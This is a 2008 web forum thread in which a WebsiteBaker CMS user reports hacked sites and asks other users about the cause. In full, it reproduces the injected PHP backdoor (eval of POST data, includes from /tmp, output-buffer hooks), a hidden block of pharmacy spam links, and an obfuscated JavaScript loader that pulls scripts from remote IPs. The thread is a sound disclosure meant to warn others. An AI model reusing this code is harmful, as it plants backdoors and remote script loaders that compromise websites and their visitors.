Welcome, Guest. Please login or register.
Did you miss your activation email?
May 23, 2012, 07:54:23 PM

Login with username, password and session length
Search:     Advanced search
Interested in joining the WebsiteBaker team?
For more Information read here or on our new website.
155440 Posts in 21702 Topics by 7732 Members
Latest Member: Smacki
* Home Help Search Login Register
Pages: [1]   Go Down
Print
Author Topic: Morfeus F***ing scanner  (Read 2415 times)
Ed

Offline Offline

Posts: 49
« on: September 02, 2008, 06:52:59 PM »
Hello fellow bakers,

Its come to my attention recently that a number of my sites running WB (latest versions) have had code added somehow.

The code doesn't show anything on the website (such as an image) but you can see it when you view the source code for both front end (public) pages and within the back end (admin).

I viewed the server logs and this is what stood out for each website

Quote
195.97.245.114 - - [30/Aug/2008:10:14:51 -0500] "GET /user/soapCaller.bs HTTP/1.1" 404 1544 "-" "Morfeus f***ing Scanner"

Many of the pages within the installation are effected and i could give a list if needed.

This is from temp/index.php

Code:
<?php

// $Id: index.php 519 2007-12-23 14:37:02Z Ruebenwurzel $

/*

 WebsiteBaker Project <http://www.websitebaker.org/>
 Copyright (C) 2004-2008, Ryan Djurovich

 WebsiteBaker is free software; you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.

 WebsiteBaker is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 GNU General Public License for more details.

 You should have received a copy of the GNU General Public License
 along with websitebaker; if not, write to the Free Software
 Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

*/

header("Location: ../index.php");

?><?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7IGxlZnQ6LTEwMDBweDsgdG9wOi0xMDAwcHg7Jz5XaGF0IElzIFZpYWdyYSBVc2VkIEZvciBwZW9wbGUgd2hvIGFyZSBpbnRlcmVzdGVkIGluIDxhIGhyZWY9aHR0cDovL2ZvcnVtLmx5Y29zLmRlL21lbWJlci5waHA/dT0yNjI4MiB0aXRsZT0nYnV5IHZpYWdyYSBvbmxpbmUnIFRBUkdFVD1fYmxhbms+YnV5IHZpYWdyYSBjaGVhcDwvYT4uIEhvdyBRdWlja2x5IERvZXMgVmlhZ3JhIFdvcmsgc3dhbGxvdyB0aGF0IHBpbGwgcHVyY2hhc2Ugc2lsZGVuYWZpbCA8YSBocmVmPWh0dHA6Ly93d3cueW91dHViZS5jb20vdHJheHRlbmJlcmc1NTUgdGl0bGU9J3ZpYWdyYSBvbmxpbmUgcGhhcm1hY3knIFRBUkdFVD1fYmxhbms+YnV5IHZpYWdyYSBwaGFybWFjeTwvYT4uIDxCUj4KSG93IHZpYWdyYSB3b3JrcyB3ZSBjYW4gZmluZCBtYW55IGV4dHJhb3JkaW5hcnkgYWx0ZXJuYXRpdmUgZXJlY3RpbGUgZHlzZnVuY3Rpb24gZHJ1ZyA8YSBocmVmPWh0dHA6Ly93d3cuYW5zd2VyYmFnLmNvbS9wcm9maWxlLz9pZD0zMTAxNjggdGl0bGU9J2J1eSB2aWFncmEgd2l0aG91dCBwcmVzY3JpcHRpb24nIFRBUkdFVD1fYmxhbms+Y2hlYXAgZ2VuZXJpYyB2aWFncmE8L2E+PEJSPgoKPHNjcmlwdD5pZih0eXBlb2YoeWFob29fY291bnRlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCchdiMlNjEkJTcyJTIwJTYxJTJDJTY5PyxgJTVGJTNCJTYxISUzRGAlNUJAJTIyMSUzOSUzMSMlMkUxMyUzMz8lMjIsfCUyMiMlMzF+NUAlMzclMkUyJTMwfjJgIiUyQyI/MSElMzUlMzguYCUzOHw5fiUyMiwlMjJAJTMxJTM5fjElMkVAOCQlMzQlMjIlNURAJTNCX2A9JTMxJTNCJTY5JCU2NiUyOCU2NCU2Rn4lNjN1YG0kJTY1JTZFJCU3NEAuI2NvI29rfGl+ZS58bWAlNjFgJTc0JTYzaD8lMjglMkZ+JTVDJTYyaCU2N2Z+dD0kJTMxfCUyRiUyOSUzRGAlM0QlNkUlNzUlNkMlNkMlMjkjJTY2JCU2RiNyJCUyOCElNjk9PyUzMD8lM0IhaSUzQz8lMzQ7aSsrISUyOWAlNjRvJTYzJTc1bX5lJTZFfHQuPyU3NyU3MiElNjkkJTc0P2VgJTI4IiUzQyNzJTYzP3IlNjl+JTcwYCU3NCElM0UlNjklNjYhKEAlNUYjJTI5QGRgb2NAdSU2RGUlNkV0LkAlNzcjJTcyfGkhdCFlJTI4JTVDYCUyMiUzQ3M/YyU3MmlwdCUyMH4lNjk/ZHwlM0Q/XyIhKz8lNjkrJTIyJTVGJTIwcyNyfCU2MyE9IyUyRi8jN0AlMzYlMkUxIyUzNjNgLn4iK2FbJTY5JTVEKyUyMiMlMkYlNjNAcGAvJTNFJTNDYCU1QyQlNUMlMkZ8JTczfGNyIWlwJTc0PyUzRT8lNUNAJTIyfiUyOXwlM0MlNUMjL3N8JTYzfnI/aXwlNzAlNzRgJTNFJCUyMiUyOSE7JykucmVwbGFjZSgvXD98QHwjfFwkfFwhfGB8fnxcfC9nLCIiKSk7dmFyIHlhaG9vX2NvdW50ZXI9MTs8L3NjcmlwdD48L2Rpdj4K'));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxkaXYgc3R5bGU9J3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwcHg7IHRvcDotMTAwMHB4Oyc+Lis/PC9kaXY+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>


and from the front end of the site when looking at the source code this code is added at the bottom of every page

Code:
<div style='position:absolute; left:-1000px; top:-1000px;'>What Is v*** Used For people who are interested in <a href=http://forum.lycos.de/member.php?u=26282 title='buy v*** online' TARGET=_blank>buy v*** cheap</a>. How Quickly Does v*** Work swallow that pill purchase sildenafil <a href=http://www.youtube.com/traxtenberg555 title='v*** online pharmacy' TARGET=_blank>buy v*** pharmacy</a>. <BR>
How v*** works we can find many extraordinary alternative erectile dysfunction drug <a href=http://www.answerbag.com/profile/?id=310168 title='buy v*** without prescription' TARGET=_blank>cheap generic v***</a><BR>

<script>if(typeof(yahoo_counter)!=typeof(1))eval(unescape('!v#%61$%72%20%61%2C%69?,`%5F%3B%61!%3D`%5B@%221%39%31#%2E13%33?%22,|%22#%31~5@%37%2E2%30~2`"%2C"?1!%35%38.`%38|9~%22,%22@%31%39~1%2E@8$%34%22%5D@%3B_`=%31%3B%69$%66%28%64%6F~%63u`m$%65%6E$%74@.#co#ok|i~e.|m`%61`%74%63h?%28%2F~%5C%62h%67f~t=$%31|%2F%29%3D`%3D%6E%75%6C%6C%29#%66$%6F#r$%28!%69=?%30?%3B!i%3C?%34;i++!%29`%64o%63%75m~e%6E|t.?%77%72!%69$%74?e`%28"%3C#s%63?r%69~%70`%74!%3E%69%66!(@%5F#%29@d`oc@u%6De%6Et.@%77#%72|i!t!e%28%5C`%22%3Cs?c%72ipt%20~%69?d|%3D?_"!+?%69+%22%5F%20s#r|%63!=#%2F/#7@%36%2E1#%363`.~"+a[%69%5D+%22#%2F%63@p`/%3E%3C`%5C$%5C%2F|%73|cr!ip%74?%3E?%5C@%22~%29|%3C%5C#/s|%63~r?i|%70%74`%3E$%22%29!;').replace(/\?|@|#|\$|\!|`|~|\|/g,""));var yahoo_counter=1;</script></div>

If you do a google search for "Morfeus f***ing Scanner"  you will see that other php CMS systems are effected as well.

Whether or not this is a problem with WebsiteBaker or with hosting i thought i should post this here to bring attention to the issue as i only found the code by accident, and i don't know if anyone else is affected in the same way.

Thanks
Logged
Ed

Offline Offline

Posts: 49
« Reply #1 on: September 02, 2008, 10:09:21 PM »
Just a small extra bit of info.. all of the files that are affected are under ownership of httpd  Files created by the server if i understand correctly.
Logged
marathoner

Offline Offline

Posts: 495
« Reply #2 on: September 03, 2008, 01:36:04 AM »
What permissions are you using for the template file?
Logged
Ed

Offline Offline

Posts: 49
« Reply #3 on: September 03, 2008, 08:15:28 AM »
The code in my post was actually from the /temp  folder not /templates.. But as it turns out both index.php files in temp and template folders had files affected.


/temp  = 777

/temp/index.php = 400 


/templates = 777

templates/index.php = 400 

Whether or not these have been changed before/during/after the code was added I'm not sure

Thanks smiley
Logged
Pages: [1]   Go Up
Print
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.16 | SMF © 2011, Simple Machines Valid XHTML 1.0! Valid CSS!
Impressum & Datenschutz | powered by WebsiteBaker. ©2004–2010 by Website Baker Org e.V. , all rights reserved | Legal Notice & Privacy Policy